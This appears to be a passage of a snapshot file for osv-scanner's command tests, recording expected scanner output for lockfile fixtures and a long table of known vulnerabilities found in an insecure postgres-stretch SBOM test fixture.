./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/ignoring_.gitignore - 4] --- [TestCommand_LocalDatabases/nested_directories_are_checked_when_`--recursive`_is_passed - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/nested_directories_are_checked_when_`--recursive`_is_passed - 2] --- [TestCommand_LocalDatabases/nested_directories_are_checked_when_`--recursive`_is_passed - 3] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/nested_directories_are_checked_when_`--recursive`_is_passed - 4] --- [TestCommand_LocalDatabases/one_specific_supported_lockfile - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip No issues found --- [TestCommand_LocalDatabases/one_specific_supported_lockfile - 2] --- [TestCommand_LocalDatabases/one_specific_supported_lockfile - 3] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip No issues found --- [TestCommand_LocalDatabases/one_specific_supported_lockfile - 4] --- [TestCommand_LocalDatabases/one_specific_supported_sbom_with_vulns - 1] Scanning dir ./testdata/sbom-insecure/postgres-stretch.cdx.xml Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Filtered 1 local/unscannable package/s from the scan. Loaded Debian local db from /osv-scanner/Debian/all.zip Loaded Go local db from /osv-scanner/Go/all.zip Total 21 packages affected by 168 known vulnerabilities (18 Critical, 70 High, 53 Medium, 3 Low, 24 Unknown) from 2 ecosystems. 11 vulnerabilities can be fixed. +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | https://osv.dev/GO-2022-0274 | 6.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.0 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-v95c-p5hm-xq8f | | | | | | | | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-1304 | 7.8 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3910-1 | | | | | | | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | 